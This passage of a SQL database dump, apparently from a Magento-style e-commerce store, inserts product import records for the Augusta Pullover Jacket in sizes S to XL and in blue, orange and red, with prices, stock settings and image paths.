\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1196\":{\"sku\":\"WJ03-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-M-Blue\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1197\":{\"sku\":\"WJ03-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-M-Orange\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1198\":{\"sku\":\"WJ03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-M-Red\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1199\":{\"sku\":\"WJ03-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-L-Blue\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(13, 'catalog_product', 'append', '{\"1200\":{\"sku\":\"WJ03-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-L-Orange\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1201\":{\"sku\":\"WJ03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-L-Red\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1202\":{\"sku\":\"WJ03-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XL-Blue\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1203\":{\"sku\":\"WJ03-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XL-Orange\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1204\":{\"sku\":\"WJ03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XL-Red\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"new